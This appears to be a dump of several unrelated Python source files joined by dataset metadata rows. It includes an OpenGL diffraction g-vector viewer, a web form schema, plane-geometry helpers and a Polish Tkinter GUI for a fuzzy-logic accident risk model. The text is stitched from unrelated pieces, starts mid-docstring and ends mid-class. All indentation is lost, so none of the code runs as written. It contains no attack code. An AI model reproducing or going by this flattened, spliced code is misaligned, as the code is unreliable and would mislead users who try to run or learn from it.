Data would be your observed g-vectors. Lines will
be a computed lattice
"""
Tk.Toplevel.__init__(self,parent)
self.parent=parent
if data is not None:
xyz=data.copy()
else:
xyz=numpy.array([0,0,0])
self.ps=Tk.StringVar()
self.ps.set('1.')
self.pointsize=1.
self.npeaks=xyz.shape[0]
self.o = myOpengl(self, width = 400, height = 400)
self.o.redraw = self.redraw
self.o.autospin_allowed = 1
self.o.fovy=5
self.o.near=1e6
self.o.far=1e-6
import math
self.o.distance=3.
#numpy.maximum.reduce(numpy.ravel(xyz))*4 / \
# math.tan(self.o.fovy*math.pi/180)
print(type(xyz),xyz.dtype.char,xyz.shape)
self.xyz=xyz
f=Tk.Frame(self)
Tk.Button(f,text="Help",command=self.o.help).pack(side=Tk.LEFT)
Tk.Button(f,text="Reset",command=self.o.reset).pack(side=Tk.LEFT)
Tk.Button(f,text="Pointsize",command=self.setps).pack(side=Tk.LEFT)
Tk.Entry(f,textvariable=self.ps).pack(side=Tk.LEFT)
Tk.Button(f,text="Quit",command=self.goaway).pack(side=Tk.RIGHT)
self.dataoff=0
self.o.pack(side = 'top', expand = 1, fill = 'both')
f.pack(side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X)
Tk.Label(self,text="Red=[1,0,0] Green=[0,1,0] Blue=[0,0,1]").pack(
side=Tk.BOTTOM,expand=Tk.NO,fill=Tk.X)
self.ubis=ubis
self.color=numpy.ones((xyz.shape[0],3),numpy.float)
print(self.color.shape)
self.tex=False
if ubis is not None:
self.ubis = self.readubis(ubis)
self.scorecolor(0)
if pars is not None:
self.tex=True
self.readspline(spline)
self.readprms(pars)
self.readimage(image)
self.after(100, self.changedata)
def readspline(self,spline):
from ImageD11 import blobcorrector
self.corrector = blobcorrector.correctorclass(spline)
def readubis(self,ubis):
from ImageD11 import indexing
return indexing.readubis(ubis)
def readprms(self,prms):
from ImageD11 import parameters
o = parameters.parameters()
o.loadparameters(prms)
self.pars=o.get_parameters()
def readimage(self,image):
from ImageD11 import transform
from fabio import openimage
self.imageobj=openimage.openimage(image)
# map from 2048x2048 to 1024x1024
d = self.imageobj.data.astype(numpy.float32)
mi= d.mean() - d.std()*2
mx= d.mean() * d.std()*2
shape=self.imageobj.data.shape
d=numpy.reshape(numpy.clip(self.imageobj.data,mi,mx),shape) # makes a clipped copy
d=(255.*(d-mi)/(mx-mi)) # scale intensity
print(d.min(),d.max(),d.mean())
self.image=numpy.zeros((1024,1024),numpy.uint8)
if d.shape==(2048,2048):
# rebin 2x2
im=(d[::2,::2]+d[::2,1::2]+d[1::2,::2]+d[1::2,1::2])/4
self.image=(255-im).astype(numpy.uint8).tostring()
self.imageWidth=1024
self.imageHeight=1024
# make a 2D array of x,y
p=[]
pk=[]
step = 64
r=[ [ 0,0 ], [0,step], [step,step], [step,0] ]
for i in range(0,1024,step):
for j in range(0,1024,step):
# i,j 1024x1024 texture coords
# x,y spatially corrected
for v in r:
pk.append([i+v[0],j+v[1]])
x,y = self.corrector.correct((i+v[0])*2 , (j+v[1])*2) # corrected
p.append([x,y])
p=numpy.array(p).T
pk=numpy.array(pk).T
omega=float(self.imageobj.header['Omega'])
self.pars['distance']=float(self.pars['distance'])*1000
tth,eta=transform.compute_tth_eta(p,**self.pars)
gve = transform.compute_g_vectors(tth,eta,omega*self.pars['omegasign'],self.pars['wavelength'])
self.pts = []
print("Setting up image mapping",p.shape,gve.shape)
for i in range(pk.shape[1]):
self.pts.append([pk[1,i]/1024.,pk[0,i]/1024.,gve[0,i],gve[1,i],gve[2,i]])
#for p in self.pts:
# print p
self.setupTexture()
def setupTexture(self):
GL.glDisable(GL.GL_TEXTURE_2D)
GL.glPixelStorei(GL.GL_UNPACK_ALIGNMENT, 1)
GL.glTexImage2D(GL.GL_TEXTURE_2D,#target
0,#level
3,#internalformat
self.imageWidth, self.imageHeight,
0,#border
GL.GL_LUMINANCE,#format
GL.GL_UNSIGNED_BYTE,# type
self.image)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_CLAMP)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_CLAMP)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_S, GL.GL_REPEAT)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_WRAP_T, GL.GL_REPEAT)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MAG_FILTER, GL.GL_NEAREST)
GL.glTexParameterf(GL.GL_TEXTURE_2D, GL.GL_TEXTURE_MIN_FILTER, GL.GL_NEAREST)
GL.glTexEnvf(GL.GL_TEXTURE_ENV, GL.GL_TEXTURE_ENV_MODE, GL.GL_DECAL)
GL.glEnable(GL.GL_TEXTURE_2D)
GL.glEnable(GL.GL_NORMALIZE)
GL.glShadeModel(GL.GL_FLAT)
def scorecolor(self,i=0):
cc = [ [ 1,0,0] , [0,1,0] , [0,0,1], [1,1,0], [1,0,1], [0,1,1],
[ 0.5,0,0] , [0,0.5,0] , [0,0,0.5], [0.5,0.5,0], [0.5,0,0.5],
[0,0.5,0.5]]
if self.ubis is not None:
from ImageD11 import indexing
for u,i in zip(self.ubis,list(range(len(self.ubis)))):
scores=indexing.calc_drlv2(u,self.xyz)
print(self.xyz.shape,scores.shape)
ind = numpy.compress( numpy.less(scores,0.02) ,
numpy.arange(self.xyz.shape[0]) )
print("Grain",i,scores.shape,ind.shape)
for j in range(3):
c=numpy.ones(self.color.shape[0])
numpy.put(c,ind,cc[i%len(cc)][j])
self.color[:,j]*=c
def go(self):
"""
Allow the toplevel to return a handle for changing data
"""
self.o.mainloop()
def goaway(self):
print("Called goaway")
self.o.destroy()
self.destroy()
if self.parent is None: sys.exit()
print("Ought to be gone now...")
def changedata(self,xyz=None):
if xyz is not None:
self.xyz=xyz.copy()
self.npeaks=xyz.shape[0]
GL.glDisableClientState(GL.GL_VERTEX_ARRAY)
GL.glDisableClientState(GL.GL_COLOR_ARRAY)
GL.glVertexPointer( 3, GL.GL_FLOAT, 0, self.xyz.astype(numpy.float32).tostring() )
GL.glColorPointer( 3, GL.GL_FLOAT, 0, self.color.astype(numpy.float32).tostring() )
GL.glEnableClientState(GL.GL_VERTEX_ARRAY)
GL.glEnableClientState(GL.GL_COLOR_ARRAY)
self.o.tkRedraw()
def setps(self):
self.pointsize=float(self.ps.get())
self.o.tkRedraw()
def redraw(self,o):
GL.glDisable(GL.GL_LIGHTING)
GL.glClearColor(0., 0., 0., 0)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glColor3f(1.0, 1.0, 1.0) # white
GL.glPointSize(self.pointsize)
GL.glDrawArrays(GL.GL_POINTS, 0, self.npeaks )
if self.ubis is not None and len(self.ubis)==1:
hkl = numpy.dot(numpy.linalg.inv(self.ubis[0]),
numpy.identity(3,numpy.float)).T
# print hkl
else:
hkl = numpy.identity(3,numpy.float)
# print hkl
GL.glBegin(GL.GL_LINE_LOOP)
GL.glColor3f(1.0, 0.0, 0.0) # red
GL.glVertex3f(0.,0.,0.)
GL.glVertex3f(hkl[0][0],hkl[0][1],hkl[0][2])
GL.glEnd()
GL.glBegin(GL.GL_LINE_LOOP)
GL.glColor3f(0.0, 1.0, 0.0) # green
GL.glVertex3f(0.,0.,0.)
GL.glVertex3f(hkl[1][0],hkl[1][1],hkl[1][2])
GL.glEnd()
GL.glBegin(GL.GL_LINE_LOOP)
GL.glColor3f(0.0, 0.0, 1.0) # blue
GL.glVertex3f(0.,0.,0.)
GL.glVertex3f(hkl[2][0],hkl[2][1],hkl[2][2])
GL.glEnd()
if self.tex:
# print "drawing images"
GL.glEnable(GL.GL_TEXTURE_2D)
GL.glColor4f(.0, 1.0, .0, 1.0) # red
GL.glBegin(GL.GL_QUADS)
# generate a grid of squares to map the texture in 3D
# opengl has better "map" methods to do this
for i,j,g1,g2,g3 in self.pts:
# print i,j,g1,g2,g3
GL.glTexCoord2f(i,j)
GL.glVertex3f(g1, g2, g3)
GL.glEnd()
# GL.glDisable(GL.GL_TEXTURE_2D)
GL.glFlush()
GL.glEnable(GL.GL_LIGHTING)
if __name__=="__main__":
try:
lines=open(sys.argv[1],"r").readlines()
except:
print("Usage %s gvector_file [ubifile] [image parfile]"%(sys.argv[0]))
raise
# sys.exit()
on=0
xyz=[]
for line in lines:
if on==1:
try:
vals=[float(x) for x in line.split()]
xyz.append( [ vals[0],vals[1],vals[2] ])
except:
pass
if line.find("xr yr zr")>0 or line.find("gx gy gz ")>0:
on=1
xyz=numpy.array(xyz)
if len(xyz) == 0 and lines[0][0]=="#":
from ImageD11 import columnfile
c = columnfile.columnfile( sys.argv[1] )
xyz = numpy.array( (c.gx, c.gy, c.gz )).T
npeaks = len(xyz)
if len(sys.argv)==3:
o=plot3d(None,data=xyz,ubis=sys.argv[2])
elif len(sys.argv)==6:
o=plot3d(None,data=xyz,ubis=sys.argv[2],image=sys.argv[3],pars=sys.argv[4],spline=sys.argv[5])
else:
o=plot3d(None,data=xyz,ubis=None)
def runit():
o.changedata(o.xyz)
o.after(100, runit )
o.mainloop()
| gpl-2.0 | 4,887,040,685,764,493,000 | 34.37574 | 127 | 0.554738 | false | 3.042494 | false | false | false |
dpausp/arguments | src/ekklesia_portal/concepts/proposition_note/proposition_note_contracts.py | 1 | 1147 | from colander import Length
from deform import Button
from deform.widget import HiddenWidget, Select2Widget, TextAreaWidget
from ekklesia_common.contract import Form, Schema, enum_property, int_property, string_property
from ekklesia_common.translation import _
from ekklesia_portal.enums import VoteByUser
class PropositionNoteSchema(Schema):
proposition_id = string_property(title=_('proposition_id'), missing=None)
user_id = int_property(title=_('user_id'), missing=None)
notes = string_property(title=_('notes'), validator=Length(min=0, max=2048), missing=None)
vote = enum_property(VoteByUser, title=_('vote'), missing=VoteByUser.UNSURE)
class PropositionNoteForm(Form):
def __init__(self, request, action):
super().__init__(PropositionNoteSchema(), request, action, buttons=[Button(title=_("submit"))])
def prepare_for_render(self, items_for_selects):
self.set_widgets({
'proposition_id': HiddenWidget(),
'user_id': HiddenWidget(),
'notes': TextAreaWidget(rows=8, missing=None),
'vote': Select2Widget(values=items_for_selects['vote'])
})
| agpl-3.0 | -2,293,608,169,246,230,800 | 39.964286 | 103 | 0.699215 | false | 3.688103 | false | false | false |
PhloxAR/math3 | math3/funcs/plane.py | 1 | 4685 | # -*- coding: utf-8 -*-
"""
Provide functions for the creation and manipulation of Planes.
Planes are represented using a numpy.array of shape (4,).
The values represent the plane equation using the values A,B,C,D.
The first three values are the normal vector.
The fourth value is the distance of the plane from the origin, down the normal.
.. seealso: http://en.wikipedia.org/wiki/Plane_(geometry)
.. seealso: http://mathworld.wolfram.com/Plane.html
"""
from __future__ import absolute_import, division, print_function
import numpy as np
from math3 import vector
from math3.utils import all_parameters_as_numpy_arrays, parameters_as_numpy_arrays
def create(normal=None, distance=0.0, dtype=None):
"""Creates a plane that runs along the X,Y plane.
It crosses the origin with a normal of 0,0,1 (+Z).
:rtype: numpy.array
:return: A plane that runs along the X,Y plane.
"""
if normal is None:
normal = [0.0, 0.0, 1.0]
return np.array([normal[0], normal[1], normal[2], distance], dtype=dtype)
@parameters_as_numpy_arrays('vector1', 'vector2', 'vector3')
def create_from_points(vector1, vector2, vector3, dtype=None):
"""Create a plane from 3 co-planar vectors.
The vectors must all lie on the same
plane or an exception will be thrown.
The vectors must not all be in a single line or
the plane is undefined.
The order the vertices are passed in will determine the
normal of the plane.
:param numpy.array vector1: a vector that lies on the desired plane.
:param numpy.array vector2: a vector that lies on the desired plane.
:param numpy.array vector3: a vector that lies on the desired plane.
:raise ValueError: raised if the vectors are co-incident (in a single line).
:rtype: numpy.array
:return: A plane that contains the 3 specified vectors.
"""
dtype = dtype or vector1.dtype
# make the vectors relative to vector2
relV1 = vector1 - vector2
relV2 = vector3 - vector2
# cross our relative vectors
normal = np.cross(relV1, relV2)
if np.count_nonzero(normal) == 0:
raise ValueError("Vectors are co-incident")
# create our plane
return create_from_position(position=vector2, normal=normal, dtype=dtype)
@parameters_as_numpy_arrays('position', 'normal')
def create_from_position(position, normal, dtype=None):
"""Creates a plane at position with the normal being above the plane
and up being the rotation of the plane.
:param numpy.array position: The position of the plane.
:param numpy.array normal: The normal of the plane. Will be normalised
during construction.
:rtype: numpy.array
:return: A plane that crosses the specified position with the specified
normal.
"""
dtype = dtype or position.dtype
# -d = a * px + b * py + c * pz
n = vector.normalise(normal)
d = -np.sum(n * position)
return create(n, d, dtype)
def create_xy(invert=False, distance=0., dtype=None):
"""Create a plane on the XY plane, starting at the origin with +Z being
the up vector.
The distance is the distance along the normal (-Z if inverted, otherwise +Z).
"""
invert = -1. if invert else 1.
    return np.array([0., 0., 1. * invert, distance], dtype=dtype)
def create_xz(invert=False, distance=0., dtype=None):
"""Create a plane on the XZ plane, starting at the origin with +Y being
the up vector.
The distance is the distance along the normal (-Y if inverted, otherwise +Y).
"""
invert = -1. if invert else 1.
    return np.array([0., 1. * invert, 0., distance], dtype=dtype)
def create_yz(invert=False, distance=0., dtype=None):
"""Create a plane on the YZ plane, starting at the origin with +X being
the up vector.
The distance is the distance along the normal (-X if inverted, otherwise +X).
"""
invert = -1. if invert else 1.
    return np.array([1. * invert, 0., 0., distance], dtype=dtype)
def invert_normal(plane):
"""Flips the normal of the plane.
The plane is **not** changed in place.
:rtype: numpy.array
:return: The plane with the normal inverted.
"""
# flip the normal, and the distance
return -plane
def position(plane):
"""Extracts the position vector from a plane.
This will be a vector co-incident with the plane's normal.
:param numpy.array plane: The plane.
:rtype: numpy.array
:return: A valid position that lies on the plane.
"""
return plane[:3] * plane[3]
def normal(plane):
"""Extracts the normal vector from a plane.
:param numpy.array plane: The plane.
:rtype: numpy.array
:return: The normal vector of the plane.
"""
return plane[:3].copy()
| bsd-3-clause | 8,162,852,061,869,322,000 | 30.655405 | 82 | 0.677268 | false | 3.709422 | false | false | false |
m-kostrzewa/FuzzyCarRisk | gui.py | 1 | 16811 | #!/usr/bin/env python3
"""
author: Kamil Cukrowski, 2016
"""
from tkinter import *
import tkinter
import tkinter.ttk
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg
import matplotlib.pyplot as plt
from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg, NavigationToolbar2TkAgg
import numpy as np
import inference
import fuzzy_sets
from matplotlib import cm
import random
class guiOnButtonDefuzyfikacja(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
def show(self, frame):
self.frame = frame
self.parent.resetFrame(frame)
##
interfere_functext = self.convertInferenceFuncToText(self.parent.ruleset.inference_func)
##
f = Frame(frame)
f.place(in_=frame, anchor="c", relx=.5, rely=.5)
##
l=tkinter.Label(f, text='Deffuzifikacja aktualna: '+interfere_functext, justify=LEFT)
l.grid(row=0,column=0,columnspan=3)
##
tkinter.Label(f, text='Ustaw deffuzifikacje: ').grid(row=1,column=0)
list=['COG','LOM','MOM','FOM']
inference_func = StringVar()
inference_func.set(interfere_functext)
tkinter.OptionMenu(f,inference_func,*list).grid(row=1,column=1)
##
b=tkinter.Button(f, text="Ustaw", command= lambda: self.OnButtonRegulyOdswierz(inference_func.get()))
b.grid(row=1,column=2)
def OnButtonRegulyOdswierz(self,text):
self.parent.ruleset.inference_func = self.convertTextToInferenceFunc(text)
self.show(self.frame)
def convertTextToInferenceFunc(self, text):
if ( text == 'COG' ):
return inference.cog
if ( text == 'MOM' ):
return inference.mom
if ( text == 'LOM' ):
return inference.lom
if ( text == 'FOM' ):
return inference.fom
raise ValueError('unexistent inference function : '+text)
def convertInferenceFuncToText(self, inference_func):
if ( inference_func == inference.cog ):
return 'COG'
if ( inference_func == inference.mom ):
return 'MOM'
if ( inference_func == inference.lom ):
return 'LOM'
if ( inference_func == inference.fom ):
return 'FOM'
raise ValueError('unexistent inference function : '+inference_func)
class guiOnButtonReguly(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
def show(self, frame):
self.parent.resetFrame(frame)
self.frame = frame
##
frame.update()
top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50)
top.pack(side=TOP, fill=BOTH, expand=True)
b1 = Frame(frame, width = frame.winfo_width(), height = 20)
b1.pack(side=BOTTOM, fill=X)
b1.pack_propagate(False)
b2 = Frame(frame, width = frame.winfo_width(), height = 20)
b2.pack(side=BOTTOM, fill=X)
b2.pack_propagate(False)
##
tkinter.Label(top, text='Reguły:').pack()
view = Frame(top)
view.pack(fill=BOTH, expand=True)
S = Scrollbar(view)
T = Text(view, width=1000)
S.pack(side=RIGHT, fill=BOTH, expand=True)
T.pack(side=LEFT, fill=BOTH, expand=True)
S.config(command=T.yview)
T.config(yscrollcommand=S.set)
self.T = T
self.refreshText()
##
tkinter.Label(b1, text='Usuń regułę numer: ').pack(side=LEFT)
e = StringVar(); e.set('1');
tkinter.Entry(b1, textvariable=e).pack(side=LEFT)
tkinter.Button(b1, text='usuń', command= lambda: self.onButtonUsunRegule(e)).pack(side=LEFT)
##
tkinter.Label(b2, text='Jeśli prędkość jest ').pack(side=LEFT)
v1 = self.addOptionMenu(b2, self.parent.dom_predkosc);
tkinter.Label(b2, text=' i widocznosc jest ').pack(side=LEFT)
v2 = self.addOptionMenu(b2, self.parent.dom_widocznosc);
tkinter.Label(b2, text=' i przyczepnosc jest ').pack(side=LEFT)
v3 = self.addOptionMenu(b2, self.parent.dom_przyczepnosc);
tkinter.Label(b2, text=' to ryzyko jest ').pack(side=LEFT)
v4 = self.addOptionMenu(b2, self.parent.dom_ryzyko);
tkinter.Button(b2, text='dodaj regułę',command= lambda: self.onButtonDodajRegule(v1.get(),v2.get(),v3.get(),v4.get())).pack(side=LEFT)
def refreshText(self):
self.T.delete("1.0", END)
self.T.insert(END, self.rulesString())
def addOptionMenu(self, frame, domain):
list_=[]
for fuzzyset in domain.fuzzy_sets:
list_.append(fuzzyset.name)
var = StringVar()
var.set(list_[0])
tkinter.OptionMenu(frame,var,*list_).pack(side=LEFT)
return var
def onButtonDodajRegule(self, predkosc, widocznosc, przyczepnosc, ryzyko):
self.parent.ruleset.add_rule_in_order([predkosc,widocznosc,przyczepnosc,ryzyko])
self.refreshText()
def onButtonUsunRegule(self, entry):
num = int(entry.get());
        if num < 1 or num > len(self.parent.ruleset.rules):
return
del self.parent.ruleset.rules[num-1]
self.refreshText()
def rulesString(self):
ruleset = self.parent.ruleset
string=""
for j in range(len(ruleset.rules)):
rule = ruleset.rules[j]
string += '%2d'%(j+1)+". Jeśli "
for i in range(len(ruleset.domains)-1):
string += ruleset.domains_list[i].linguistic_name+" jest "+rule.input_sets[i].name + " i "
string = string[:-3]; # remove last ' i '
i=-1;
string += " to "+ruleset.domains_list[i].linguistic_name+" jest "+rule.output_set.name+'\n';
return string
class guiOnButtonFPrzynaleznosci(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
##
self.fuzzyName = ""
self.fuzzyNameList = ""
##
self.fuzzyTypeList=[]
for type in ['trójkątna', 'prostokątna', 'trapezowa', 'Guassa']:
self.fuzzyTypeList.append(type)
self.fuzzyType = StringVar()
self.fuzzyType.set(self.fuzzyTypeList[0])
##
self.values=[]
for i in [0,1,2,3]:
e = StringVar()
e.set('0')
self.values.append( e )
def show(self, frame, dom):
self.frame = frame
self.dom = dom
##
self.parent.resetFrame(frame)
##
self.fuzzyNameList=[]
for fuzzyset in dom.fuzzy_sets:
self.fuzzyNameList.insert(0,fuzzyset.name)
self.fuzzyName = StringVar()
self.fuzzyName.set(self.fuzzyNameList[0])
##
frame.update()
top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50)
top.pack(side=TOP, fill=BOTH)
top.pack_propagate(False)
bottom = Frame(frame, width = frame.winfo_width(), height = 50)
bottom.pack(side=BOTTOM, fill=BOTH)
top.pack_propagate(False)
        # our plot
fig = plt.Figure(figsize=(15,15), dpi=60)
subplot = fig.add_subplot(1,1,1)
dom.addPlotsToSubplot(subplot)
canvas = FigureCanvasTkAgg(fig, top)
toolbar = NavigationToolbar2TkAgg(canvas, top)
toolbar.pack(side=TOP, fill=BOTH)
canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH)
        # and the edit widgets!
tkinter.Label(bottom,text="Funkcja do edycji:").grid(column=0,row=0)
tkinter.OptionMenu(bottom,self.fuzzyName,*self.fuzzyNameList).grid(column=0,row=1)
tkinter.Label(bottom,text="Kształt funkcji").grid(column=1,row=0)
tkinter.OptionMenu(bottom,self.fuzzyType,*self.fuzzyTypeList).grid(column=1,row=1)
tkinter.Label(bottom,text="Wartości punktów").grid(column=2,row=0,columnspan=5)
for i in range(0,len(self.values)):
tkinter.Entry(bottom, textvariable=self.values[i], width=5).grid(column=2+i,row=1)
b=tkinter.Button(bottom, text="Odśwież",
command= lambda: self.onButtonFPrzynaleznosciOdswierz(dom, self.fuzzyName.get(), self.fuzzyType.get(), self.values))
b.grid(column=7,row=1)
def refresh(self):
return self.show(self.frame, self.dom)
def onButtonFPrzynaleznosciOdswierz(self, dom, fuzzyName, fuzzyType, values):
val = []
for i in range(0, len(values)):
try:
val.append( float(values[i].get()) )
except ValueError:
print("Bad input")
return
old_set = dom.get_set(fuzzyName)
if fuzzyType == 'trójkątna':
f_set = fuzzy_sets.TriangleSet(old_set.range_min, val[0], val[1], val[2], old_set.range_max, old_set.name)
if fuzzyType == 'prostokątna':
f_set = fuzzy_sets.RectangleSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name)
if fuzzyType == 'trapezowa':
f_set = fuzzy_sets.TrapezoidSet(old_set.range_min, val[0], val[1], val[2], val[3], old_set.range_max, old_set.name)
if fuzzyType == 'Guassa':
f_set = fuzzy_sets.GaussSet(old_set.range_min, val[0], val[1], old_set.range_max, old_set.name)
dom.change_set(fuzzyName, f_set)
self.refresh()
class guiOnButtonPlaszczyznaSterowan(tkinter.Tk):
def __init__(self, parent):
self.parent = parent
def show(self, frame):
frame.update()
top = Frame(frame, width = frame.winfo_width(), height = frame.winfo_height()-50)
top.pack(side=TOP, fill=BOTH)
top.pack_propagate(False)
bottom = Frame(frame, width = frame.winfo_width(), height = 50)
bottom.pack(side=BOTTOM, fill=Y)
bottom.pack_propagate(False)
##
tkinter.Label(bottom, text='Przyczepność: ').pack(side=LEFT)
tmp = self.parent.dom_przyczepnosc.fuzzy_sets[0]
scale = tkinter.Scale(bottom,
from_=tmp.range_min, to=tmp.range_max,
resolution=(tmp.range_max-tmp.range_min)/500,
orient=HORIZONTAL)
scale.pack(fill=X, expand=True, side=LEFT)
tkinter.Button(bottom, text='Rysuj', command= lambda: self.refreshPlot(top, scale.get())).pack(side=LEFT)
##
l=tkinter.Label(top, text=(
"Aby narysować wykres,\n"
"ustaw parametr przyczepność i wciśnij przycisk 'Rysuj'\n"
"\n"
"Generacja wykresu może trochę potrwać!\n"))
l.pack(fill=BOTH, expand=True, anchor=CENTER)
def refreshPlot(self, frame, przyczepnosc):
# draw 3d graph of 2 rule input 1 rule output
num_gridpoints = 25
vels = np.linspace(self.parent.dom_predkosc.fuzzy_sets[0].range_min,
self.parent.dom_predkosc.fuzzy_sets[0].range_max, num_gridpoints)
viss = np.linspace(self.parent.dom_widocznosc.fuzzy_sets[0].range_min,
self.parent.dom_widocznosc.fuzzy_sets[0].range_max, num_gridpoints)
vels, viss = np.meshgrid(vels, viss)
risks = np.ones((num_gridpoints, num_gridpoints))
inference = self.parent.ruleset.inference
for x in range(num_gridpoints):
for y in range(num_gridpoints):
risks[x, y] = inference([vels[x][y], viss[x][y], przyczepnosc])
fig = plt.figure(figsize=(15,15), dpi=60)
fig.canvas.set_window_title('Wykres 3D dla przyczepności = '+'%.2f'%przyczepnosc)
ax = fig.add_subplot(111,projection="3d")
ax.set_xlabel("Prędkość [km/h]")
ax.set_ylabel("Widoczność [km]")
ax.set_zlabel("Prawdopodobieństwo wypadku [%]")
ax.set_zlim([self.parent.dom_ryzyko.fuzzy_sets[0].range_min, self.parent.dom_ryzyko.fuzzy_sets[0].range_max]);
ax.plot_surface(vels, viss, risks, rstride=1, cstride=1, cmap=cm.coolwarm)
fig.show()
plt.show()
#~ self.parent.resetFrame(frame)
#~ canvas = FigureCanvasTkAgg(fig, frame)
#~ toolbar = NavigationToolbar2TkAgg(canvas, frame)
#~ toolbar.pack(side=TOP, fill=BOTH)
#~ canvas.get_tk_widget().pack(side=BOTTOM, fill=BOTH)
class guiOnButtonGeneratorLiczb():
def __init__(self,parent):
self.parent = parent;
self.predkosc = StringVar();
self.widocznosc = StringVar();
self.przyczepnosc = StringVar();
self.ryzyko = StringVar();
self.debug = StringVar();
def show(self, inframe):
frame = tkinter.Frame(inframe);
frame.place(in_=inframe, anchor="c", relx=.5, rely=.5);
tkinter.Label(frame,text="Wyznacz wyjście dla wejść:\n").grid(column=0, row=0, columnspan=2)
tkinter.Label(frame,text="Prędkość ").grid(column=0, row=1)
tkinter.Entry(frame, textvariable=self.predkosc).grid(column=1, row=1)
tkinter.Label(frame,text="Widoczność ").grid(column=0, row=2)
tkinter.Entry(frame, textvariable=self.widocznosc).grid(column=1, row=2)
tkinter.Label(frame,text="Przyczepność ").grid(column=0, row=3)
tkinter.Entry(frame, textvariable=self.przyczepnosc).grid(column=1, row=3)
tkinter.Label(frame,text="Prawdopodobieństwo wypadku ").grid(column=0, row=4)
tkinter.Entry(frame, textvariable=self.ryzyko).grid(column=1, row=4)
tkinter.Label(frame,text="\n").grid(column=0, row=5)
b=tkinter.Button(frame, text="Wygeneruj losowe wartości", command=self.onButtonWygeneruj)
b.grid(column=0, row=6)
b=tkinter.Button(frame,text="Wyznacz", command=self.onButtonWyznacz)
b.grid(column=1, row=6)
tkinter.Label(frame,textvariable=self.debug).grid(column=0, row=8,columnspan=2)
def myRandrange(self, fuzzy_set):
        # draw uniformly within the set's [range_min, range_max] interval
        return round(fuzzy_set.range_min + random.random() * (fuzzy_set.range_max - fuzzy_set.range_min), 3);
def onButtonWygeneruj(self):
fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0];
self.predkosc.set( self.myRandrange(fuzzy_set) );
fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0];
self.widocznosc.set( self.myRandrange(fuzzy_set) );
fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0];
self.przyczepnosc.set( self.myRandrange(fuzzy_set) );
self.ryzyko.set("");
def onButtonWyznacz(self):
try:
pre = float(self.predkosc.get());
fuzzy_set = self.parent.dom_predkosc.fuzzy_sets[0];
if pre < fuzzy_set.range_min or pre > fuzzy_set.range_max:
raise ValueError;
except ValueError:
self.debug.set('Zla wartosc predkości.');
return
try:
wid = float(self.widocznosc.get());
fuzzy_set = self.parent.dom_widocznosc.fuzzy_sets[0];
if wid < fuzzy_set.range_min or wid > fuzzy_set.range_max:
raise ValueError;
except ValueError:
self.debug.set('Zla wartosc widoczności.');
return
try:
prz = float(self.przyczepnosc.get());
fuzzy_set = self.parent.dom_przyczepnosc.fuzzy_sets[0];
if prz < fuzzy_set.range_min or prz > fuzzy_set.range_max:
raise ValueError;
except ValueError:
self.debug.set('Zla wartosc przyczepności.');
return
self.ryzyko.set( self.parent.ruleset.inference( [pre, wid, prz ] ) );
class gui(tkinter.Tk):
width=700
height=600
def __init__(self,parent,fuzzy_system):
tkinter.Tk.__init__(self,parent)
[dom_predkosc, dom_widocznosc, dom_przyczepnosc, dom_ryzyko, ruleset] = fuzzy_system
self.dom_predkosc = dom_predkosc
self.dom_widocznosc = dom_widocznosc
self.dom_przyczepnosc = dom_przyczepnosc
self.dom_ryzyko = dom_ryzyko
self.ruleset = ruleset
self.parent = parent
self.guiOnButtonFPrzynaleznosci = guiOnButtonFPrzynaleznosci(self)
self.guiOnButtonReguly = guiOnButtonReguly(self)
self.guiOnButtonPlaszczyznaSterowan = guiOnButtonPlaszczyznaSterowan(self)
self.guiOnButtonDefuzyfikacja = guiOnButtonDefuzyfikacja(self)
self.guiOnButtonGeneratorLiczb = guiOnButtonGeneratorLiczb(self)
self.initialize()
def initialize(self):
self.geometry('{}x{}'.format(self.width, self.height))
self.lf = Frame(self, bg = "light gray", width = 100, height = self.height)
self.lf.pack(side=LEFT, fill=Y, padx=1, pady=1)
self.initLeftFrame(self.lf)
self.rf = Frame(self, bg = "light gray", width = (self.width-100), height = self.height)
self.rf.pack(side=RIGHT, anchor=CENTER, expand=True, fill=BOTH, padx=3, pady=3)
quote=("Program zaliczeniowy na przedmiot PSZT.\n"
"\n\n\n\n\n"
"Wykonali: Kamila Cipior, Kamil Cukrowski, Michał Kostrzewa\n"
"Prowadząca: p. Joanna Panasiuk \n"
"Rok wykonania projektu: 2016\n")
l=tkinter.Label(self.rf,text=quote, justify=RIGHT, font=("Helvetica", 14))
l.pack(fill=BOTH, expand=True, anchor=CENTER)
def initLeftFrame(self,lf):
tkinter.Label(lf,text="\nMenu:\n\n-- Funkcje przynależności --").pack(fill=X)
tkinter.Button(lf,text="prędkość", command= lambda: self.onButtonFPrzynaleznosci(self.dom_predkosc)).pack(fill=X)
tkinter.Button(lf,text="widoczność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_widocznosc)).pack(fill=X)
tkinter.Button(lf,text="przyczepność", command= lambda: self.onButtonFPrzynaleznosci(self.dom_przyczepnosc)).pack(fill=X)
tkinter.Button(lf,text="ryzyko", command= lambda: self.onButtonFPrzynaleznosci(self.dom_ryzyko)).pack(fill=X)
tkinter.Label(lf,text="\n").pack(fill=X)
tkinter.Label(lf,text="-- Reguły --").pack(fill=X)
tkinter.Button(lf,text="Wyświetl", command=self.OnButtonReguly).pack(fill=X)
tkinter.Button(lf,text="Defuzyfikacja", command=self.OnButtonDefuzyfikacja).pack(fill=X)
